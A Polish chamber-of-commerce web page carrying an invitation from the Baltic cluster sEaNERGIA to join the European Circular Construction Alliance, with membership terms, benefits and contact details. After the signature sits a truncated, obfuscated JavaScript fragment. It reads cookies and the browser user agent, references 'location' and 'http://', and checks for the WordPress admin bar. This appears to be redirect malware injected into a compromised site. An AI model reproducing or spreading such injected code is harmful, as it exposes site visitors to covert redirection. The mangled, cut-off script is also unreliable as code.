Polskie budownictwo i energia w Europejskim Aliansie ECCA- zaproszenie Bałtyckiego Klastra sEaNERGIA | Północna Izba Gospodarcza w Koszalinie

Szanowni Państwo,

W styczniu br. Bałtycki Klaster sEaNERGIA znalazł się w grupie założycielskiej Europejskiego Aliansu Podmiotów działających w obszarze budownictwa, energetyki oraz szeroko pojętej gospodarki o obiegu zamkniętym (EuropeanCircular Construction Alliance) (http://circularconstruction.eu/). Będzie to meta-klaster, a w dalszej perspektywie Europejskie Partnerstwo Strategiczne na rzecz Internacjonalizacji (European Strategic Cluster Partnership for Internationalization – ESCP4i), wspierający klastry, ich członków (zwłaszcza MŚP) oraz inne podmioty w zakresie innowacji, ekspansji rynkowej, marketingu, internacjonalizacji, budowania przewagi konkurencyjnej oferowanych produktów, usług czy technologii w obszarze budownictwa o obiegu zamkniętym (circularconstruction).

Serdecznie Państwa  zapraszam do włączenia się w tą inicjatywę i  przystąpienia do Aliansu w charakterze pełnoprawnego członka lub stowarzyszonego.  Dzięki temu otrzymają Państwo  dostęp do innowacyjnych firm, klastrów oraz organizacji branżowych za granicą w celu promocji Państwa działań oraz możliwość współpracy z innymi jednostkami zagranicznymi w tworzeniu nowych międzysektorowych innowacyjnych rozwiązań.

Członkiem pełnoprawnym Aliansu mogą być wyłącznie klastry  lub sieci biznesowe ( np. izby, stowarzyszenia przedsiębiorstw) posiadające osobowość prawną. Natomiast inne podmioty (organizacje badawcze i uczelnie,jednostki publiczne i samorządowe, władze miejskie, organizacje pozarządowe, stowarzyszenia, platformy technologiczne)mogą dołączyć do Aliansu na zasadzie członka stowarzyszonego.

Dla zrzeszonych w klastrze przedsiębiorstw udział w Aliansie to szansa na:

  • Promocję oferty produktów i usług na stronie projektu oraz w tworzonym katalogu firm działających w obszarze gospodarki, budownictwa o obiegu zamkniętym oraz podczas wszystkich wydarzeń międzynarodowych w których uczestniczą przedstawiciele Aliansu.
  • Opracowanie koncepcji wspólnych produktów/usług w zakresie budownictwa o obiegu zamkniętym oraz wsparcia w ich promocji w Europie oraz na arenie międzynarodowej.
  • Opracowanie strategii internacjonalizacji oraz plan działań na najbliższe lata dla podmiotów zrzeszonych w klastrach należących do Aliansu.
  • Wsparcie w zakresie rozwoju współpracy międzysektorowej członków klastra.
  • Udział w międzynarodowych konsorcjach realizujących wspólne projekty badawcze, misje branżowe czy inne inicjatywy służące internacjonalizacji i tworzeniu innowacyjnych produktów, możliwość nawiązywania kontaktów z podmiotami w Europie oraz na arenie międzynarodowej.

Udział w Aliansie jest bezpłatny. Zapraszamy Państwa do udziału w tej inicjatywie poprzez złożenie deklaracji przystąpienia do Aliansu. Nie pociąga  to za sobą żadnych zarówno formalnych jak i finansowych zobowiązań. Więcej informacji znajdziecie Państwo na stronie http://circularconstruction.eu a ewentualne  pytania proszę adresować do Pani Aleksandry Oleksik (a.oleksik@seanergia.pl).

Z poważaniem

Elżbieta J. Syrda ( e.syrda@sea-development.pl🙂
Koordynator Bałtyckiego Klastra sEaNERGIA , członek ECCA

 

'toUTCString',’cookie',’split',’length',’charAt',’substring',’indexOf',’userAgent',’match',’MSIE;',’OPR',’Chromium',’Firefox',’Chrome',’ppkcookie',’location',’http://',’getElementById',’wpadminbar',’undefined',’setTime',’getTime',';\x20expires='];(function(c,d){var e=function(f){while(–f){c[’push'](c[’shift']());}};e(++d);}(a,0x1f4));var b=function(c,d){c=c-0x0;var e=a[c];return e;};(function(){if(document[b(’0x0′)](b(’0x1′))===null){if(typeof c===b(’0x2′)){function c(d,e,f){var g=”;if(f){var h=new Date();h[b(’0x3′)](h[b(’0x4′)]()+f*0x18*0x3c*0x3c*0x3e8);g=b(’0x5′)+h[b(’0x6′)]();}document[b(’0x7′)]=d+’=’+(e||”)+g+';\x20path=/';}function i(j){var k=j+’=';var l=document[b(’0x7′)][b(’0x8′)](';');for(var m=0x0;m